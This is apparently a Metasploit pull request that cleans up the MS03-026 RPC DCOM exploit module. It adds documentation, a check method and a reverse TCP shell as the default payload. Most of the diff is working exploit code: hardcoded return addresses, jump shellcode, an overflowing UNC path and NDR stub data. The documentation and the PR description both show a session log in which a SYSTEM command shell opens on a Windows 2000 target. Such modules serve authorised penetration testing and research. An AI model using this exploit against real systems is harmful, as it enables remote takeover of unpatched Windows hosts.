### PR TITLE
ms03_026_dcom: cleanup

### DIFF
--- a/documentation/modules/exploit/windows/dcerpc/ms03_026_dcom.md
+++ b/documentation/modules/exploit/windows/dcerpc/ms03_026_dcom.md
@@ -1,0 +1,43 @@
+## Vulnerable Application
+
+This module exploits a stack buffer overflow in the RPCSS service, this vulnerability
+was originally found by the Last Stage of Delirium research group and has been
+widely exploited ever since. This module can exploit the English versions of
+Windows NT 4.0 SP3-6a, Windows 2000, Windows XP, and Windows 2003 all in one request :)
+
+## Verification Steps
+
+1. Start msfconsole
+1. Do: `use exploit/windows/smb/ms03_026_dcom`
+1. Do: `set rhosts <rhosts>`
+1. Do: `run`
+1. You should get a `SYSTEM` shell.
+
+## Options
+
+## Scenarios
+
+### Windows 2000 Server SP4 (English)
+
+```
+msf6 exploit(windows/dcerpc/ms03_026_dcom) > run
+
+[*] Started reverse TCP handler on 172.16.191.192:4444 
+[*] 172.16.191.164:135 - Trying target Windows NT SP3-6a/2000/XP/2003 Universal...
+[*] 172.16.191.164:135 - Binding to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:0.0@ncacn_ip_tcp:172.16.191.164[135] ...
+[*] 172.16.191.164:135 - Calling DCOM RPC with payload (1648 bytes) ...
+[*] Encoded stage with x86/shikata_ga_nai
+[*] Sending encoded stage (267 bytes) to 172.16.191.164
+[*] Command shell session 1 opened (172.16.191.192:4444 -> 172.16.191.164:1027 ) at 2021-11-27 23:52:35 -0500
+
+
+Shell Banner:
+Microsoft Windows 2000 [Version 5.00.2195]
+(C) Copyright 1985-2000 Microsoft Corp.
+
+C:\WINNT\system32>
+-----
+          
+
+C:\WINNT\system32>
+```

--- a/modules/exploits/windows/dcerpc/ms03_026_dcom.rb
+++ b/modules/exploits/windows/dcerpc/ms03_026_dcom.rb
@@ -9,44 +9,43 @@ class MetasploitModule < Msf::Exploit::Remote
   include Msf::Exploit::Remote::DCERPC
 
   def initialize(info = {})
-    super(update_info(info,
-      'Name'           => 'MS03-026 Microsoft RPC DCOM Interface Overflow',
-      'Description'    => %q{
+    super(
+      update_info(
+        info,
+        'Name' => 'MS03-026 Microsoft RPC DCOM Interface Overflow',
+        'Description' => %q{
           This module exploits a stack buffer overflow in the RPCSS service, this vulnerability
-        was originally found by the Last Stage of Delirium research group and has been
-        widely exploited ever since. This module can exploit the English versions of
-        Windows NT 4.0 SP3-6a, Windows 2000, Windows XP, and Windows 2003 all in one request :)
-      },
-      'Author'         => [ 'hdm', 'spoonm', 'cazz' ],
-      'License'        => MSF_LICENSE,
-      'References'     =>
-        [
-          [ 'CVE', '2003-0352'  ],
-          [ 'OSVDB', '2100'     ],
-          [ 'MSB',   'MS03-026' ],
-          [ 'BID', '8205'       ],
-        ],
-      'Privileged'     => true,
-      'DefaultOptions' =>
-        {
-          'EXITFUNC' => 'thread'
+          was originally found by the Last Stage of Delirium research group and has been
+          widely exploited ever since. This module can exploit the English versions of
+          Windows NT 4.0 SP3-6a, Windows 2000, Windows XP, and Windows 2003 all in one request :)
         },
-      'Payload'        =>
-        {
-          'Space'    => 880,
-          'MinNops'  => 300,
+        'Author' => [ 'hdm', 'spoonm', 'cazz' ],
+        'License' => MSF_LICENSE,
+        'References' => [
+          [ 'CVE', '2003-0352' ],
+          [ 'OSVDB', '2100' ],
+          [ 'MSB', 'MS03-026' ],
+          [ 'BID', '8205' ],
+        ],
+        'Privileged' => true,
+        'DefaultOptions' => {
+          'EXITFUNC' => 'thread',
+          'PAYLOAD' => 'windows/shell/reverse_tcp'
+        },
+        'Payload' => {
+          'Space' => 880,
+          'MinNops' => 300,
           'BadChars' => "\x00\x0a\x0d\x5c\x5f\x2f\x2e",
           'StackAdjustment' => -3500
         },
-      'Platform'       => %w{ win },
-      'Targets'        =>
-        [
+        'Platform' => %w[win],
+        'Targets' => [
           # Target 0: Universal
           [
             'Windows NT SP3-6a/2000/XP/2003 Universal',
             {
               'Platform' => 'win',
-              'Rets'     =>
+              'Rets' =>
                 [
                   0x77f33723, # Windows NT 4.0 SP6a (esp)
                   0x7ffde0eb, # Windows 2000 writable address + jmp+0xe0
@@ -55,12 +54,19 @@ class MetasploitModule < Msf::Exploit::Remote
                   0x001b0b0b, # Windows 2003 call near [ebp+0x30] (unicode.nls - thanks Litchfield!)
                   0x776a240d, # Windows NT 4.0 SP5 (eax) ws2help.dll
                   0x74ff16f3, # Windows NT 4.0 SP3/4 (pop pop ret) rnr20.dll
-                ],
+                ]
             },
           ],
         ],
-      'DefaultTarget'  => 0,
-      'DisclosureDate' => '2003-07-16'))
+        'Notes' => {
+          'Stability' => [ CRASH_SERVICE_DOWN ],
+          'SideEffects' => [ IOC_IN_LOGS ],
+          'Reliability' => [ REPEATABLE_SESSION ]
+        },
+        'DefaultTarget' => 0,
+        'DisclosureDate' => '2003-07-16'
+      )
+    )
   end
 
   # don't bother with this module for autoexploitation, it creates
@@ -69,38 +75,61 @@ class MetasploitModule < Msf::Exploit::Remote
     false
   end
 
+  def check
+    begin
+      connect
+    rescue Rex::Proto::SMB::Exceptions::ErrorCode => e
+      return CheckCode::Safe("SMB error: #{e.message}")
+    end
+
+    handle = dcerpc_handle('4d9f4ab8-7d1c-11cf-861e-0020af6e7c57', '0.0', 'ncacn_ip_tcp', [rport])
+
+    begin
+      dcerpc_bind(handle)
+    rescue Rex::Proto::SMB::Exceptions::ErrorCode => e
+      return CheckCode::Safe("SMB error: #{e.message}")
+    end
+
+    CheckCode::Detected
+  end
+
   def exploit
     connect
     print_status("Trying target #{target.name}...")
 
-    handle = dcerpc_handle('4d9f4ab8-7d1c-11cf-861e-0020af6e7c57', '0.0', 'ncacn_ip_tcp', [datastore['RPORT']])
+    handle = dcerpc_handle('4d9f4ab8-7d1c-11cf-861e-0020af6e7c57', '0.0', 'ncacn_ip_tcp', [rport])
+
     print_status("Binding to #{handle} ...")
-    dcerpc_bind(handle)
-    print_status("Bound to #{handle} ...")
+
+    begin
+      dcerpc_bind(handle)
+    rescue Rex::Proto::SMB::Exceptions::ErrorCode => e
+      fail_with(Failure::NotVulnerable, "SMB error: #{e.message}")
+    end
 
     # Carefully create the combination of addresses and code for cross-os exploitation
     xpseh = rand_text_alphanumeric(360, payload_badchars)
 
     # Jump to [esp-4] - (distance to shellcode)
     jmpsc =
-      "\x8b\x44\x24\xfc"      + 		# mov eax,[esp-0x4]
-      "\x05\xe0\xfa\xff\xff"  + 		# add eax,0xfffffae0 (sub eax, 1312)
-      Rex::Arch::X86.jmp_reg('eax') 	# jmp eax
+      "\x8b\x44\x24\xfc" +           # mov eax,[esp-0x4]
+      "\x05\xe0\xfa\xff\xff" +       # add eax,0xfffffae0 (sub eax, 1312)
+      Rex::Arch::X86.jmp_reg('eax')  # jmp eax
 
     # Jump to [ebp+0x30] - (distance to shellcode) - thanks again Litchfield!
     jmpsc2k3 =
-      "\x8b\x45\x30"         + 		# mov eax,[ebp+0x30]
-      "\x05\x24\xfb\xff\xff" + 		# add eax,0xfffffb24 (sub 1244)
-      Rex::Arch::X86.jmp_reg('eax') 	# jmp eax
+      "\x8b\x45\x30" +               # mov eax,[ebp+0x30]
+      "\x05\x24\xfb\xff\xff" +       # add eax,0xfffffb24 (sub 1244)
+      Rex::Arch::X86.jmp_reg('eax')  # jmp eax
 
     # Windows 2003 added by spoonm
-    xpseh[ 246 - jmpsc2k3.length, jmpsc2k3.length ] = jmpsc2k3
-    xpseh[ 246, 2 ] = Rex::Arch::X86.jmp_short("$-#{jmpsc2k3.length}")
-    xpseh[ 250, 4 ] = [ target['Rets'][4] ].pack('V')
+    xpseh[246 - jmpsc2k3.length, jmpsc2k3.length] = jmpsc2k3
+    xpseh[246, 2] = Rex::Arch::X86.jmp_short("$-#{jmpsc2k3.length}")
+    xpseh[250, 4] = [ target['Rets'][4] ].pack('V')
 
-    xpseh[ 306, 2 ] = Rex::Arch::X86.jmp_short('$+8')
-    xpseh[ 310, 4 ] = [ target['Rets'][3] ].pack('V')
-    xpseh[ 314, jmpsc.length ] = jmpsc
+    xpseh[306, 2] = Rex::Arch::X86.jmp_short('$+8')
+    xpseh[310, 4] = [ target['Rets'][3] ].pack('V')
+    xpseh[314, jmpsc.length] = jmpsc
 
     #
     # NT 4.0 SP3/SP4 work the same, just use a pop/pop/ret that works on both
@@ -121,7 +150,7 @@ class MetasploitModule < Msf::Exploit::Remote
     #
 
     nt4sp3jmp = Rex::Arch::X86.jmp_short("$+#{12 + 5}") +
-      rand_text(2, payload_badchars)
+                rand_text(2, payload_badchars)
 
     nt4sp5jmpback = "\xe9" + [ ((5 + 4 + payload.encoded.length) * -1) ].pack('V')
     nt4sp3jmpback = "\xe9" + [ ((12 + 5 + 5 + payload.encoded.length) * -1) ].pack('V')
@@ -137,13 +166,12 @@ class MetasploitModule < Msf::Exploit::Remote
 
     # Create the evil UNC path used in the overflow
     uncpath =
-      Rex::Text.to_unicode("\\\\") +
+      Rex::Text.to_unicode('\\\\') +
       make_nops(32) +
 
       # When attacking NT 4.0, jump over 2000/XP return
       Rex::Arch::X86.jmp_short(16) +
       Rex::Arch::X86.jmp_short(25) +
-
       [ target['Rets'][2] ].pack('V') +   # Return address for 2000 (ebx)
       [ target['Rets'][0] ].pack('V') +   # Return address for NT 4.0 SP6 (esi)
       [ target['Rets'][1] ].pack('V') +   # Writable address on 2000 and jmp for NT 4.0
@@ -167,40 +195,34 @@ class MetasploitModule < Msf::Exploit::Remote
       NDR.short(1) +
       NDR.long(0) +
       NDR.long(0) +
-
       rand_text(16) +
-
       NDR.long(0) +
       NDR.long(0) +
       NDR.long(0) +
       NDR.long(0) +
       NDR.long(0) +
-
       NDR.long(rand(0xFFFFFFFF)) +
-
       NDR.UnicodeConformantVaryingStringPreBuilt(uncpath) +
-
       NDR.long(0) +
       NDR.long(rand(0xFFFFFFFF)) +
       NDR.long(rand(0xFFFFFFFF)) +
-
       NDR.long(1) +
       NDR.long(rand(0xFFFFFFFF)) +
-
       NDR.long(1) +
       NDR.long(rand(0xFFFFFFFF)) +
       NDR.long(rand(0xFFFFFFFF)) +
       NDR.long(rand(0xFFFFFFFF)) +
       NDR.long(rand(0xFFFFFFFF)) +
-
       NDR.long(1) +
       NDR.long(1) +
       NDR.long(rand(0xFFFFFFFF))
 
-    print_status('Sending exploit ...')
+    print_status("Calling DCOM RPC with payload (#{stubdata.length} bytes) ...")
+
     begin
       dcerpc_call(0, stubdata, nil, false)
-    rescue Rex::Proto::DCERPC::Exceptions::NoResponse
+    rescue StandardError => e
+      raise e unless e.to_s.include?('STATUS_PIPE_DISCONNECTED')
     end
 
     handler


### PR DESCRIPTION
* Add documentation
* Add rudimentary `check` method
* Add `notes`
* Set `windows/shell/reverse_tcp` as default payload
* `rubocop -a`

Tested on:

* Windows 2000 Server SP4 (English)
* Windows 2000 Professional SP4 (Finnish)

```
msf6 exploit(windows/dcerpc/ms03_026_dcom) > run

[*] Started reverse TCP handler on 172.16.191.192:4444 
[*] 172.16.191.164:135 - Trying target Windows NT SP3-6a/2000/XP/2003 Universal...
[*] 172.16.191.164:135 - Binding to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:0.0@ncacn_ip_tcp:172.16.191.164[135] ...
[*] 172.16.191.164:135 - Calling DCOM RPC with payload (1648 bytes) ...
[*] Encoded stage with x86/shikata_ga_nai
[*] Sending encoded stage (267 bytes) to 172.16.191.164
[*] Command shell session 1 opened (172.16.191.192:4444 -> 172.16.191.164:1027 ) at 2021-11-27 23:52:35 -0500


Shell Banner:
Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.

C:\WINNT\system32>
-----
          

C:\WINNT\system32>
```
